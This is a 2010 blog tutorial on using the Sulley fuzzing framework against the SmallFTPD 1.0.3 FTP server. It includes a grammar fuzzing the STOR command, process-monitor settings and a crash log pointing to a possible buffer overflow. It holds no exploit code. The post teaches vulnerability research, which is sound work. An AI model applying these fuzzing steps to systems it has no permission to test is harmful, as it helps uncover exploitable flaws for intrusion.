Archive for May, 2010

 

Fuzzing 101 with Sulley

May 16, 2010 in Security

[SecurePlanet Wiki][SecurePlanet RSS Feed][SecurePlanet RSS Vulnerabilities]

Using Sulley to Find Exploits

Overview:
Sully is a great tool to find bugs and overflows in applications that could allow for remote exploitation. The official definition:

Sulley – http://code.google.com/p/sulley/ Sulley is a fuzzer development and fuzz testing framework consisting of multiple extensible components. Sulley (IMHO) exceeds the capabilities of most previously published fuzzing technologies, commercial and public domain. The goal of the framework is to simplify not only data representation but to simplify data transmission and target monitoring as well.

To install: svn checkout http://sulley.googlecode.com/svn/trunk/ Sulley

How to:

Step 1) Create Sulley Grammer

In this example I go against a small ftpserver called SmallFTPD FTP Server version 1.0.3 (http://smallftpd.sourceforge.net/).

First off, it helps to make a valid FTP connection and parse it through Wireshark to see all the request/responses necessary to fuzz.

Once you have the protocol basics down, you need to build a Sulley Grammar, which defines how the python script will talk to the FTP service. Here is an example of how I configured mine:

click here for the ftp.txt script

The code itself should be pretty explanatory and it should be important to know which fields get FUZZed. In this case, we are going to fuzz the FTP Command request area (STOR).

s_initialize(“stor”)
s_static(“STOR”)
s_delim(” “)
s_string(“AAAA”) #This field will be fuzzed
s_static(“\r\n”)

The best thing about Sulley is that during the fuzzing process, if the application fails, it will automatically try to restart the program and keep fuzzing. This is where you specify they application to restart:

target.procmon_options = {
“proc_name” : “smallftpd.exe”,
“stop_commands” : [‘wmic process where (name=”smallftpd.exe”) delete”‘],
“start_commands” : [‘C:\\Documents and Settings\\Administrator\\Desktop\\smallftpd-1.0.3-fix\\smallftpd.exe’],
}

Step 2) I also enabled the Procmon Agent (C:\sulley>python process_monitor.py -c c:\smallftpd.crash -p “smallftpd.exe”). The purpose of the Procmon Agent is to identify process faults and stores detailed information about crashes.

Step 3) With the grammar complete and Procmon Agent running, I open smallftpd, create a user and pass named ftp, and start the service. Once the ftp server is started, I run the python/sulley script.

sulley_running

The screen shot above is the different iterations that it is fuzzing through. You can also open a browser and go to http://127.0.0.1:26000 and see all the output. You have to manually refresh the screen to see updates. After running it for about 2 minutes we see that test case 39 created a access violation:

000039 :00401f2c mov byte [eax],0x0 from thread 4944 caused access violation

sulley_http

Looking further into the issue we can see that EIP tried to write into EAX which was located at ffffffff causing violation. This was most likely caused by a buffer overflow.

sulley_output

A future article will take this overflow to exploitation…

For more information go to:
www.fuzzing.org/wp-content/SulleyEpyDoc/public/sulley-module.html